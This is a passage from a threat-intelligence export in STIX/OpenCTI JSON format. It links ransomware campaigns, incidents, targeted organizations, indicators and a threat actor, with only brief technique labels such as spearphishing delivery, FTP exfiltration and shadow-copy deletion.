"target_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"created": "2020-02-04T15:26:17.407Z",
"modified": "2020-02-04T15:26:17.407Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0f956e4d-6967-4157-9e31-c76e8c738bf2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--fad9e08f-fa22-4e36-9eec-1d3e099a99be",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"target_ref": "identity--65463837-a41a-4b61-a074-b2f20f097555",
"x_opencti_source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"x_opencti_target_ref": "identity--65463837-a41a-4b61-a074-b2f20f097555",
"created": "2020-02-04T15:40:57.452Z",
"modified": "2020-02-04T15:40:57.452Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "185a4784-933c-4dbb-9430-443bf8b3e41c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--288794bd-993d-452b-b4ef-8e2c0239e772",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"created": "2020-02-04T15:43:58.932Z",
"modified": "2020-02-04T15:43:58.932Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5cd25a3b-801f-4882-a385-7b0e862e3dd0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--ba8e9eeb-0e52-4e91-a5cc-6a1782d0056c",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"x_opencti_source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"x_opencti_target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"created": "2020-02-04T16:03:20.289Z",
"modified": "2020-02-04T16:03:20.289Z",
"x_opencti_first_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_last_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "9d19c35e-1aea-4fc0-9b5d-f2110d313a7b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--b57a8b86-24ef-433a-b7c7-c262e4345961",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:51.204Z",
"modified": "2020-02-05T10:04:51.204Z",
"x_opencti_first_seen": "2020-02-05T10:04:51.204Z",
"x_opencti_last_seen": "2020-02-05T10:04:51.204Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0ae19019-5918-45ff-ba41-eb90e0d1a040",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--b2f5fb87-7e50-484f-8232-9f65c10b0058",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:56.941Z",
"modified": "2020-02-05T10:04:56.941Z",
"x_opencti_first_seen": "2020-02-05T10:04:56.941Z",
"x_opencti_last_seen": "2020-02-05T10:04:56.941Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f91780d9-0343-4afb-a958-9d4f33e8ba24",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--d9fbecb8-530b-400d-a0f1-be1821f62e7e",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:02.842Z",
"modified": "2020-02-05T10:05:02.842Z",
"x_opencti_first_seen": "2020-02-05T10:05:02.842Z",
"x_opencti_last_seen": "2020-02-05T10:05:02.842Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "47d655f0-37a1-4f88-9422-1815d03dcea5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--e0ee6084-d4e6-4d01-9eb5-50ef1b975b79",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:09.027Z",
"modified": "2020-02-05T10:05:09.027Z",
"x_opencti_first_seen": "2020-02-05T10:05:09.027Z",
"x_opencti_last_seen": "2020-02-05T10:05:09.027Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ed925c59-4aa6-474d-bad4-a75a26ff0d34",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--9bdc2b8e-c0c7-4a19-bf1f-1859d0e6a7c3",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:22.144Z",
"modified": "2020-02-05T10:06:22.144Z",
"x_opencti_first_seen": "2020-02-05T10:06:22.144Z",
"x_opencti_last_seen": "2020-02-05T10:06:22.144Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "96afe29a-c34c-47e9-9971-25c4c68e922e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0246b8d2-73ea-48fd-a888-b2afce788f1a",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:42:54.683Z",
"modified": "2020-02-04T14:42:54.683Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ffa10d8d-537b-40ac-a815-3833a6088277",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
},
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--ce8eab1f-1c4d-4c3c-9cbd-1dc6ea25d566",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-07T14:32:51.314Z",
"modified": "2020-01-07T14:32:51.314Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ba4e7881-4f7c-46cf-9898-4b2e92e88da8",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--33799534-2e54-4b00-bbf6-32be6359f7a6",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:57:37.084Z",
"modified": "2020-02-04T14:57:37.084Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "23b8a103-328c-4709-8b89-bcd576854631",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--4e67bf72-02fc-4f09-808c-550c6112f3f0",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"target_ref": "identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"x_opencti_source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"x_opencti_target_ref": "identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"created": "2020-02-04T15:07:27.882Z",
"modified": "2020-02-04T15:07:27.882Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ec754648-ac4e-4f95-9b50-09b40d94211f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--560ff6cf-b17e-4672-9e9f-64527f411396",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"x_opencti_source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"x_opencti_target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"created": "2020-02-04T15:07:35.222Z",
"modified": "2020-02-04T15:07:35.222Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2cc2bcf8-ffff-4ee8-ad31-f62585c3d120",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--2de7b0c0-65d2-4c33-ad51-6de4d96e8c82",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"target_ref": "identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"x_opencti_source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"x_opencti_target_ref": "identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"created": "2020-02-04T15:17:40.349Z",
"modified": "2020-02-04T15:17:40.349Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "39ab5370-01de-4430-868e-7c9ae3feafbd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--a842a8f3-1a46-4c2f-86c6-0730f826123b",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"created": "2020-02-04T15:19:59.638Z",
"modified": "2020-02-04T15:19:59.638Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e644110c-4987-4d02-be42-7a9baf26151a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--50550e47-fedd-4360-9e33-f76af5be17ac",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"target_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"x_opencti_source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"x_opencti_target_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"created": "2020-01-08T16:05:38.889Z",
"modified": "2020-01-08T16:05:38.889Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "985c6abd-5fc7-408c-834d-adfd0dcbe7cb",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--df0e4c16-3729-4704-86d5-5aa4ae9f151a",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:44:50.252Z",
"modified": "2020-02-04T15:44:50.252Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "838bc34a-4372-4aee-8c3d-a1cb15e3e651",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--2dcab7ee-67a3-4d56-9eb0-ccea4ca67591",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:00:21.726Z",
"modified": "2020-02-05T10:00:21.726Z",
"x_opencti_first_seen": "2020-02-05T10:00:21.726Z",
"x_opencti_last_seen": "2020-02-05T10:00:21.726Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "1bba2fa9-17d0-4a77-a010-ecfef60e4990",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--553397d5-0d5c-4d77-a679-9013acf11eb1",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:31.690Z",
"modified": "2020-02-05T10:05:31.690Z",
"x_opencti_first_seen": "2020-02-05T10:05:31.690Z",
"x_opencti_last_seen": "2020-02-05T10:05:31.690Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7a52f2c1-5e9b-43c4-acc9-045bd9576fe7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7f190cdd-4c24-4197-8e19-de7a43cb4d69",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:16.342Z",
"modified": "2020-02-05T10:06:16.342Z",
"x_opencti_first_seen": "2020-02-05T10:06:16.342Z",
"x_opencti_last_seen": "2020-02-05T10:06:16.342Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4142c887-0f39-4521-8971-c5373deada6a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5b0a8c1c-6265-42f3-84f0-e486dc3af97c",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:38:42.064Z",
"modified": "2020-01-07T14:38:42.064Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c97c9c83-e5dc-47f8-a3ec-3c287997fb1a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--01ec830f-d69f-4ec7-8b31-df27320c60ca",
"type": "relationship",
"relationship_type": "related-to",
"description": "[email protected] also used to register C2 of multiple Maze campaign analyzed by Proofpoint and attributed to the TA2101 threat actor.",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"created": "2020-01-07T15:00:58.124Z",
"modified": "2020-01-07T15:00:58.124Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f509d225-f82b-4dce-9d29-9ec6c7bd9f87",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5bb1db7e-66f7-4edc-bb45-f862d47299a3",
"type": "relationship",
"relationship_type": "uses",
"description": "Delete shadow copies",
"source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"target_ref": "attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"x_opencti_source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_target_ref": "attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"created": "2020-02-04T15:00:06.930Z",
"modified": "2020-02-04T15:00:06.930Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4622fbab-2721-4118-92d0-c05c6ed52786",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--6239433a-7b9a-478f-9e4e-4c7ced862958",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"target_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"x_opencti_source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"x_opencti_target_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"created": "2020-02-04T15:11:31.786Z",
"modified": "2020-02-04T15:11:31.786Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8ea0c05f-dc20-4d08-9506-ffd411761c6e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--508b19b9-30a8-44ac-b2d5-b010fdd30dbd",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"x_opencti_source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"x_opencti_target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"created": "2019-07-29T12:48:18.000Z",
"modified": "2019-07-29T12:48:18.000Z",
"x_opencti_first_seen": "2019-05-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-05-15T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_id": "c171be3e-dd78-4012-ac09-bc21f1a440eb"
},
{
"id": "relationship--bcfa95a6-9978-4477-95f4-666308e2f316",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"target_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"x_opencti_source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"x_opencti_target_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"created": "2020-01-08T16:10:18.215Z",
"modified": "2020-01-08T16:10:18.215Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8d27cea5-a656-449e-91a9-b2d1f4bd1fc5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--36de8086-e0b8-4857-959b-223a5e4d70ff",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"target_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"x_opencti_source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"x_opencti_target_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"created": "2020-02-04T15:39:26.456Z",
"modified": "2020-02-04T15:39:26.456Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c7cffb41-5953-4d29-9007-5eb20ceaf147",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--98657e57-423b-4d22-918f-f7e6c0bace20",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"target_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"x_opencti_source_ref": "incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"x_opencti_target_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"created": "2020-02-04T16:02:27.182Z",
"modified": "2020-02-04T16:02:27.182Z",
"x_opencti_first_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_last_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "76df2a68-a3da-40e5-a03c-496284ed722f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f6457544-4232-492a-9900-fdc16e2120ba",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:00:01.093Z",
"modified": "2020-02-05T10:00:01.093Z",
"x_opencti_first_seen": "2020-02-05T10:00:01.093Z",
"x_opencti_last_seen": "2020-02-05T10:00:01.093Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2184aa69-9bb1-411b-ac8a-997fcbb7a1bb",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--40934950-668c-4222-af9d-86861a673d64",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:45.777Z",
"modified": "2020-02-05T10:04:45.777Z",
"x_opencti_first_seen": "2020-02-05T10:04:45.777Z",
"x_opencti_last_seen": "2020-02-05T10:04:45.777Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "34094eb4-aa91-47ad-8408-e68cb3c7b6d5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--63e10ccf-fcc5-420a-85e3-0ba606e424df",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
